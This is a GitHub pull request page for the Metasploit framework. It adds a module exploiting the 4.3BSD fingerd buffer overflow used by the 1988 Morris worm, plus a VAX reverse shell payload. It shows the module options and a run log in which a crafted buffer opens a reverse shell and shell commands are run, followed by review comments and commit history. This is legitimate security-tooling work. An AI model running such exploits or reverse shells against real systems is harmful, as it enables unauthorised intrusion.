Add Morris worm fingerd exploit and VAX reverse shell #10700

wvu · 2018-09-25T10:34:30Z

msf5 exploit(bsd/finger/morris_fingerd_bof) > options

Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
   RPORT   79               yes       The target port (TCP)


Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85


msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500

whoami
nobody
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

Would you like to play a game?

busterb · 2018-09-25T17:58:20Z

This could definitely use some docs to explain historical significance.

h00die · 2018-09-25T19:33:11Z

Meant to post this earlier... +10 for awesome commenting, not only for jokes but also insight.

busterb · 2018-11-02T16:24:02Z

Release Notes

This adds a module exploiting a stack buffer overflow in fingerd on 4.3BSD. This vulnerability was exploited by the Morris worm in 1988-11-02.

wvu added module blocked Blocked by one or more additional tasks feature payload labels Sep 25, 2018

wvu force-pushed the feature/fingerd branch 2 times, most recently from 9905d2e to 293db39 Compare September 25, 2018 16:21

wvu added the needs-docs label Sep 25, 2018

wvu force-pushed the feature/fingerd branch 2 times, most recently from d367877 to 3fb1929 Compare September 25, 2018 20:22

wvu force-pushed the feature/fingerd branch 3 times, most recently from c06441e to c92605b Compare October 4, 2018 07:45

wvu removed the needs-docs label Oct 4, 2018

wvu force-pushed the feature/fingerd branch 7 times, most recently from 713d7ed to ae6039d Compare October 5, 2018 19:41

wvu mentioned this pull request Oct 5, 2018

Fix issue that not interact with session when exploit with single-host rhosts. #10751

Merged

wvu force-pushed the feature/fingerd branch 6 times, most recently from 33ea8b0 to c80bc1f Compare October 12, 2018 17:52

wvu force-pushed the feature/fingerd branch from c80bc1f to fd4bf5c Compare October 20, 2018 05:35

wvu force-pushed the feature/fingerd branch 3 times, most recently from 4066e26 to 2b9b859 Compare October 20, 2018 06:16

wvu mentioned this pull request Oct 20, 2018

Add Morris worm sendmail debug mode exploit #10836

Merged

wvu force-pushed the feature/fingerd branch 5 times, most recently from 5e7ad89 to b79dd74 Compare October 22, 2018 20:57

wvu added 7 commits October 22, 2018 18:32

Add 4.3BSD VAX reverse command shell payload

8f2df48

Add Morris worm fingerd stack buffer overflow

fa892d8

Add module doc and promise a Docker environment

114692e

Add Space, BadChars, Encoder, and DisableNops

01d11e7

Prefer aobleq over incl/cmpl/bleq in payload

8459aad

Add check method to detect 4.3BSD fingerd

3ca3094

Link to Docker environment in module doc

f40647b

wvu force-pushed the feature/fingerd branch from b79dd74 to f40647b Compare October 22, 2018 23:32

wvu removed the blocked Blocked by one or more additional tasks label Oct 29, 2018

busterb self-assigned this Nov 2, 2018

busterb merged commit f40647b into rapid7:master Nov 2, 2018

busterb added a commit that referenced this pull request Nov 2, 2018

Land #10700, Add Morris worm fingerd exploit and VAX reverse shell

1d81f37

msjenkins-r7 pushed a commit that referenced this pull request Nov 2, 2018

Land #10700, Add Morris worm fingerd exploit and VAX reverse shell

1ae0455

wvu deleted the feature/fingerd branch November 2, 2018 17:20

gdavidson-r7 added the rn-exploit label Nov 4, 2018

wvu mentioned this pull request Dec 24, 2019

Add ForceExploit to 4.3BSD (VAX) exploits #12754

Merged

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add Morris worm fingerd exploit and VAX reverse shell #10700

Add Morris worm fingerd exploit and VAX reverse shell #10700

wvu commented Sep 25, 2018 •

edited

Loading

busterb commented Sep 25, 2018

h00die commented Sep 25, 2018

busterb commented Nov 2, 2018 •

edited by gdavidson-r7

Loading

Add Morris worm fingerd exploit and VAX reverse shell #10700

Add Morris worm fingerd exploit and VAX reverse shell #10700

Conversation

wvu commented Sep 25, 2018 • edited Loading

busterb commented Sep 25, 2018

h00die commented Sep 25, 2018

busterb commented Nov 2, 2018 • edited by gdavidson-r7 Loading

Release Notes

wvu commented Sep 25, 2018 •

edited

Loading

busterb commented Nov 2, 2018 •

edited by gdavidson-r7

Loading